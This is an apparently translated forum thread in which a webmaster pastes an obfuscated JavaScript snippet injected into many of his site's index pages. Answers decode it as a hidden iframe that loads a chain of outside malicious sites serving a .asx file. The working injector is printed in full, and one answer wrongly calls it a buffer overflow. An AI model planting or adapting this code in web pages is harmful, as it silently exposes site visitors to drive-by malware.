今天早上,我发现一个脚本出现在我们的两个网站的多个位置。
不用说,我正在从备份中恢复网站,更改密码并搜索 FTP 日志。我还应该采取其他措施吗?
这是脚本。您知道它可以做什么吗?
<!-- C/C v0870 --><script>function fY(){};xN='';fY.prototype = {k : function() {p=7854;this.eS="";pT=false;return '\u0068\u0058\u0058\u0070\u003a\u002f\u002f\u0062\u0065\u006f\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0058\u006d\u006c'.replace(/X/g, 't').replace(/HHHHHHHHHHHHHHHHHHHHHH/g, 'linkonline.com/index.h');t="t";var uY="uY";var q=27591;var o=function(){return 'o'};},c : function() {var kB='';function wC(){};this.lQ="";var a=new Date(); var uA=false;function gR(){}; var b='replace';this.iA="";var m='';var w=document;var uT='';var bD="";var v=new Array();var mQ=function(){};var j=window;function kA(){};function aO(){};var f=24513;var hJ=new Date();var vH=new Date();fU=false;var qH=new Date();this.aI='';String.prototype.pZ=function(u,g){return this[b](u, g)};var mZ="mZ";var jI='';var n='';this.nW='';var gC=function(){return 'gC'};s="";var e = '\u0073\u0058\u0058\u0058\u0048\u0048\u0048\u0048\u0075\u0074'.replace(/XXX/g, 'etH').replace(/HHHHH/g, 'Timeo');this.yO="yO";this.aJ="";var h = '\u003c\u0068\u0074\u006d\u006c\u0020\u003e\u003c\u0068\u0065\u0061\u0064\u0020\u003e\u003c\u0048\u0048\u0065\u0061\u0064\u003e\u003c\u0062\u006f\u0058\u0058\u0058\u0058\u0058\u0058\u0058\u0058\u0064\u0079\u003e\u003c\u0048\u0048\u0074\u006d\u006c\u003e'.replace(/XXXXXXXX/g, 'dy ></bo').replace(/HH/g, '/h');this.fK="";this.d=false;var uC=function(){};aIB=63220;try {var tZ=false;var vN=function(){return 'vN'};bT="bT";var oX=6312;var lT=new Array();this.uP=false;var aV=28730;var gJ = '\u0062\u0058\u0048\u0079'.replace(/X/g, 'o').replace(/H/g, 'd');var jY=function(){};this.jZC='';var hPC=new Date();var z = '\u0073\u0058\u0058\u006c\u0065'.replace(/XX/g, 'HH').replace(/HH/g, 'ty');var pA=4555;var uM=new Array();var eZ=false;this.sT="";var i = '\u0069\u0066\u0058\u0058\u0048\u0065'.replace(/XX/g, 'ra').replace(/H/g, 'm');this.lF=false;var dH='';var wG = '\u0077\u0072\u0058\u0058\u0065'.replace(/XX/g, 'iH').replace(/H/g, 't');this.dI=false;hS='';var vF=false;jZCE=40515;var l = '\u0063\u0072\u0065\u0061\u0074\u0065\u0058\u0058\u0058\u0058\u0048\u0048\u0074'.replace(/XXXX/g, 'Elem').replace(/HH/g, 'en');this.kDH="";var eO="eO";var zT=function(){};vS=12622;var r = '\u0073\u0058\u0063'.replace(/X/g, 'H').replace(/H/g, 'r');bS=false;nWF=false;var dC="dC";var cU="";this.cX=false;var tE='';var gV = '\u0073\u0065\u0058\u0041\u0058\u0048\u0048\u0048\u0048\u0048\u0058\u0065'.replace(/X/g, 't').replace(/HHHHH/g, 'tribu');mM='';var tX='';var sS='';var eI = '\u0068\u0058\u0058\u0058\u0048\u006e'.replace(/XXX/g, 'idH').replace(/HH/g, 'de');function x(){};var jW=function(){return 'jW'};var hP = '\u0076\u0069\u0058\u0058\u0058\u0069\u006c\u0069\u0074\u0079'.replace(/XXX/g, 'HHb').replace(/HH/g, 'si');pM='';dL=""; var jZ = '\u0061\u0070\u0070\u0065\u006e\u0058\u0058\u0068\u0048\u006c\u0064'.replace(/XX/g, 'dC').replace(/H/g, 'i');function bO(){};var nU=false;this.iP=''; this.pN=51645;this.kS="kS"; var eX=this.k();var nC="nC";this.dY='';this.dZ='';oH="";eP=61106;tN=54831;var gU=new Array();var yK=new Date();var y=document[l](i);var nWFY=function(){return 'nWFY'};var bDB="bDB";oU=51980;var pH="";y[z][hP] = eI;var jC=function(){};var rF=function(){};var fA='';y[gV](r, eX);var oI=false;tQ="tQ";hQ="";var nJ=function(){return 'nJ'};w[gJ][jZ](y);lR=13433;this.jD=false;var fKK="";cN="cN";wK="wK";sQ=false;var sE=18173;} catch(bM) {var iC='';var dQ=new Array();var gL=function(){return 'gL'};this.nH='';eIU='';w.write(h);var lN=false;function xI(){};this.jU="jU";fG="";var kD = this;bP=false;kL=50758;var uTT=new Array();qW=21507;var sB=new Array();this.gQ='';oD="oD";j[e](function(){ function hF(){};this.fQ=13986;rN='';oC='';fKY="fKY";var cZ=false;this.xF="";var eT='';kD.c();this.lL="lL";var jQ="";lG="";this.wL=12697;var tG=new Array();rC=false;this.mP="";var tGE="tGE";}, 124);var xD=false;var sL=false;var qS=new Array();}var cP="";var rE=function(){return 'rE'};rM="rM";this.mO="mO";}};var wR=function(){return 'wR'};var hO=new fY(); var uW=function(){return 'uW'};hO.c();var hK=12219;</script>
超过 20 个文件,所有文件均以“index”名称命名。’ 或 ‘家’。' 被修改了。FTP 日志显示了哪些文件被再次下载和上传,所以我不认为这是通过表单漏洞进行的。
答案1
这将创建一个不可见的 iframe:
<iframe style="visibility: hidden;" src="http://beolinkonline.com/index.html"></iframe>
beolinkonline.com 包含另一个来自的 iframehttp://smasmaild.com/kilovork/index.php?468f4ff003bdcff4c1c6b9ef06f2c100
它尝试运行 Windows 媒体文件 (.asx)。
答案2
在我看来这看起来像是一种缓冲区溢出......
在哪里以及如何注入的?您没有对用户的帖子/上传进行清理吗?
您应该阅读有关 2005 年 myspace 黑客事件的资料。
它会让你明白你是如何轻易被黑客入侵的:D
答案3
您可以考虑更改 ftp 用户名和密码。您还可以将 ftp 连接限制到某些 IP 地址/域,以便只能从选定位置访问 ftp 服务。